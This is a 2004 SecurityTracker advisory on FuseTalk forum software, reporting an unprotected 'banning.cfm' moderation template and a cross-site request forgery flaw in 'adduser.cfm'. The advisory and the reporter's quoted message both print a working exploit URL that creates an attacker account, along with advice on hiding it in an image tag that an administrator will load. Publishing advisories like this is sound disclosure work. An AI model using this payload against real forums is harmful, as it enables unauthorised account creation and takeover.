SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  FuseTalk Vendors:  FuseTalk Inc.
FuseTalk Grants Remote Users Access to 'banning' Template
SecurityTracker Alert ID:  1010080
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 6 2004
Impact:  Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 4.0
Description:  An input validation vulnerability was reported in FuseTalk. A remote user can access an administrative template.

Stuart Jamieson reported that unpatched releases of version 4.0 allow a remote user to access the 'banning.cfm' template and ban other users.

It is also reported that in version 2.0 (and possibly other versions), a remote authenticated user can pass parameters to the 'adduser.cfm' administration template via an HTTP GET statement. A remote user can create a URL that, when loaded by an authenticated target administrator, will cause a new account to be created. A demonstration exploit URL is provided:

http://[target]/admin/adduser.cfm?FTVAR_FIRSTNAME FRM=God&FTVAR_LASTNAMEFRM=God
&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass
&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFOR UMSFRM=0&FTVAR_USERTYPEFRM=g
&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70
&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RET URNERROR=Yes
&FT_ACTION=adduser

The report indicates that this URL can be embedded within an '[img]' image tag so that when an authenticated target administrator views the image, the URL will be executed by the target user's browser.
Impact:  A remote user can gain access to the 'banning.cfm' administrative template.
Solution:  The report suggests that a patch is available from the vendor to correct the 'banning.cfm' access flaw.
Vendor URL:  www.fusetalk.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
Reported By:  Stuart Jamieson <stuart.jamieson@active-outdoors.co.uk>
Message History:   None.

 Source Message Contents
Date:  5 May 2004 12:15:06 -0000
From:  Stuart Jamieson <stuart.jamieson@active-outdoors.co.uk>
Subject:  Fuse Talk Vunerabilities

 



As well as well known XSS vunerabilities the latest version 4.0 seems to have some other issues.

Unpatched releases of V4.0 allow the user to access the Template banning.cfm without any administrati
ve privleages. All users of the
 software should check with fusetalk.com for the latest security patches to prevent this being misuse
d.

Access to this template allows any user to ban any other users and seems to be particularly vunerable
. Fortunately it does not affect
 the administration templates, merely the moderation ones so the chances of an attacker gaining highe
r levels of access seem unlikely.

Another issue seems to exist which I have only so far tested on Version 2.0 and am unsure if this als
o occurs in V3-4, it appears
 that within the administration templates adduser.cfm allows parameters to be passed by a get stateme
nt rather than a post statement.

This potential vunerability could allow a hostile to create a new account by tricking some other pers
on with moderator powers. Although
 it may seem obvious that a link to 
http://www.victim.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EM
AILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FT
VAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM
=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_
COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser
would create a new account, if the adress is hidden within an image tag [img][/img] then the event wi
ll fire the creation of the account
 when the administrators web browser attempts to download the image.

This could be extended by the variable FTVAR_SCRIPTRUN=self.close which even in not creating an accou
nt would be capable running malicious
 javascript when an administrative user attempted to follow the link.

Since fusetalk relies nearly entirely on POST based data the best fix for this is to restrict posting
 of data by a GET statement.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC